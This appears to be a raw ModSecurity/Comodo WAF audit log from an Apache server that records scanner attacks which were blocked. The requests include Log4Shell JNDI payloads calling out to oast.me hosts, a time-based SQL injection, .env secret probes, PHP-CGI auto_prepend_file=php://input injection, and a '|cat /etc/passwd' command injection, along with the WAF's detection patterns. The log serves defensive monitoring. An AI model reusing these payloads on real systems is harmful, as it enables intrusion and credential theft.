p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --254d4943-Z-- --1fd9c332-A-- [04/Jun/2025:09:56:50 +0700] aD-18l_DvM40jZomokuB4gAAABY 103.236.140.4 49424 103.236.140.4 8181 --1fd9c332-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1fd9c332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fd9c332-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749005810757989 800 (- - -) Stopwatch2: 1749005810757989 800; combined=334, p1=300, p2=0, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fd9c332-Z-- --6783c629-A-- [04/Jun/2025:10:45:04 +0700] aD_BQDNXNn6zAsHj7JAkFAAAAEE 103.236.140.4 46078 103.236.140.4 8181 --6783c629-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0us2vpgpeonc6qdbef0gzezfz855zq3f.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0us2vpgpeonc6qdbef06efde65erawen.oast.me} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0us2vpgpeonc6qdbef0zh1nusznpxbk8.oast.me} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef0rchpqey85p7jz.oast.me} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0odxrdbj3oneqn.oast.me} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0q1995grymmmf7.oast.me} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef09i7wucnxwhic5.oast.me} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0us2vpgpeonc6qdbef0q56w6jhmutt64.oast.me} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0us2vpgpeonc6qdbef0fdhfjeewmfhbi.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0fejbmonq7ruf7.oast.me} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0eumdecitp5nn4.oast.me} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef0q77yczb3f84ug.oast.me} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0focxzm4pixcjd.oast.me} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0us2vpgpeonc6qdbef01hu8sfe78f3xp.oast.me} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0us2vpgpeonc6qdbef0dtnpbsda7y4wk.oast.me}=${jndi:ldap://${hostName}.cookievalue.d0us2vpgpeonc6qdbef0gmnedn5io6et4.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171603218 --6783c629-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6783c629-E-- --6783c629-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749008704976993 6684 (- - -) Stopwatch2: 1749008704976993 6684; combined=5278, p1=410, p2=4833, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6783c629-Z-- --9cd69636-A-- [04/Jun/2025:10:45:04 +0700] aD_BQJLmnxTwEPX7Iubb6wAAAIs 103.236.140.4 46092 103.236.140.4 8181 --9cd69636-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173179336 --9cd69636-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cd69636-E-- --9cd69636-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749008704983383 3274 (- - -) Stopwatch2: 1749008704983383 3274; combined=1759, p1=461, p2=1267, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd69636-Z-- --552da648-A-- [04/Jun/2025:11:22:29 +0700] aD_KBV_DvM40jZomokufNQAAABE 103.236.140.4 34060 103.236.140.4 8181 --552da648-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Accept-Charset: utf-8 --552da648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --552da648-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749010949759676 913 (- - -) Stopwatch2: 1749010949759676 913; combined=396, p1=357, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --552da648-Z-- --43362274-A-- [04/Jun/2025:11:22:54 +0700] aD_KHthPZJx8OfNaLCpVeQAAANI 103.236.140.4 34962 103.236.140.4 8181 --43362274-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Win64; x64; Trident/5.0; .NET CLR 3.7.50745; Media Center PC 6.0; Zune 4.7; .NET4.0C; en-MT) Accept-Charset: utf-8 --43362274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43362274-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749010974135426 810 (- - -) Stopwatch2: 1749010974135426 810; combined=364, p1=320, p2=0, p3=0, p4=0, p5=44, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43362274-Z-- --6900603c-A-- [04/Jun/2025:11:28:07 +0700] aD_LVzNXNn6zAsHj7JA4SgAAAEg 103.236.140.4 46814 103.236.140.4 8181 --6900603c-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173214187 --6900603c-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --8035ca0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8035ca0f-E-- --8035ca0f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749020752487618 4877 (- - -) Stopwatch2: 1749020752487618 4877; combined=3296, p1=462, p2=2794, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8035ca0f-Z-- --0713e612-A-- [04/Jun/2025:14:31:46 +0700] aD_2Yl_DvM40jZomokvvLwAAAAw 103.236.140.4 48098 103.236.140.4 8181 --0713e612-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.157 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0713e612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0713e612-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749022306716749 791 (- - -) Stopwatch2: 1749022306716749 791; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0713e612-Z-- --c3de7e65-A-- [04/Jun/2025:14:31:48 +0700] aD_2ZNhPZJx8OfNaLCqoXwAAAMU 103.236.140.4 48144 103.236.140.4 8181 --c3de7e65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.157 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c3de7e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3de7e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749022308810081 771 (- - -) Stopwatch2: 1749022308810081 771; combined=351, p1=318, p2=0, p3=0, p4=0, p5=33, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3de7e65-Z-- --05c2285c-A-- [04/Jun/2025:14:48:46 +0700] aD_6XjNXNn6zAsHj7JCLwAAAAEg 103.236.140.4 42670 103.236.140.4 8181 --05c2285c-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173234458 --05c2285c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --05c2285c-E-- --05c2285c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749023326435817 2493 (- - -) Stopwatch2: 1749023326435817 2493; combined=1294, p1=297, p2=975, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c2285c-Z-- --4066f90f-A-- [04/Jun/2025:14:48:47 +0700] aD_6X9hPZJx8OfNaLCquawAAAMY 103.236.140.4 42692 103.236.140.4 8181 --4066f90f-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0us2vpgpeonc6qdbef06cpdm365615a9.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0us2vpgpeonc6qdbef05kqwzs6x1rujt.oast.me} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0us2vpgpeonc6qdbef0mi7kcxn4kobqn.oast.me} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef03jz6r6p8u8msb.oast.me} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0jbigjjw91318e.oast.me} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0k4kw15e9pyjrf.oast.me} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef05dxzdcpjfrxaa.oast.me} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0us2vpgpeonc6qdbef0iu1qiyz5g55pm.oast.me} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0us2vpgpeonc6qdbef0hfyru877r55ej.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0ccxcfwkh5qngj.oast.me} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0gnji43fetx6nr.oast.me} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef0ykfayd9ahz7x7.oast.me} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0zfyo4i83op6hy.oast.me} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0us2vpgpeonc6qdbef0p4abi7t1okf94.oast.me} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0us2vpgpeonc6qdbef01dez1kidbqomm.oast.me}=${jndi:ldap://${hostName}.cookievalue.d0us2vpgpeonc6qdbef0ec6ic58q3qadw.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172824295 --4066f90f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4066f90f-E-- --4066f90f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749023327032336 6779 (- - -) Stopwatch2: 1749023327032336 6779; combined=4740, p1=405, p2=4294, p3=0, p4=0, p5=41, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4066f90f-Z-- --34bb6358-A-- [04/Jun/2025:15:02:45 +0700] aD_9pTNXNn6zAsHj7JCQKAAAAE4 103.236.140.4 56716 103.236.140.4 8181 --34bb6358-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 4.188.112.137 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 4.188.112.137 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --34bb6358-C-- --34bb6358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34bb6358-E-- --34bb6358-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749024165560041 4479 (- - -) Stopwatch2: 1749024165560041 4479; combined=3085, p1=497, p2=2553, p3=0, p4=0, p5=34, sr=90, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34bb6358-Z-- --de4dc069-A-- [04/Jun/2025:15:08:13 +0700] aD_-7dhPZJx8OfNaLCqz3AAAAMg 103.236.140.4 34156 103.236.140.4 8181 --de4dc069-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --de4dc069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de4dc069-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749024493267211 683 (- - -) Stopwatch2: 1749024493267211 683; combined=285, p1=255, p2=0, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de4dc069-Z-- --69cc692f-A-- [04/Jun/2025:15:40:26 +0700] aEAGejNXNn6zAsHj7JCYawAAAEI 103.236.140.4 38278 103.236.140.4 8181 --69cc692f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 142.93.129.190 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69cc692f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69cc692f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749026426642185 912 (- - -) Stopwatch2: 1749026426642185 912; combined=311, p1=264, p2=0, p3=0, p4=0, p5=47, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69cc692f-Z-- --9cd3bd58-A-- [04/Jun/2025:15:42:56 +0700] aEAHEJLmnxTwEPX7IuZKIwAAAIA 103.236.140.4 39250 103.236.140.4 8181 --9cd3bd58-B-- GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Cache-Control: max-age=0 --9cd3bd58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cd3bd58-E-- --9cd3bd58-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/modules/home/index.php?lang=english|cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026576174778 3013 (- - -) Stopwatch2: 1749026576174778 3013; combined=1112, p1=503, p2=562, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 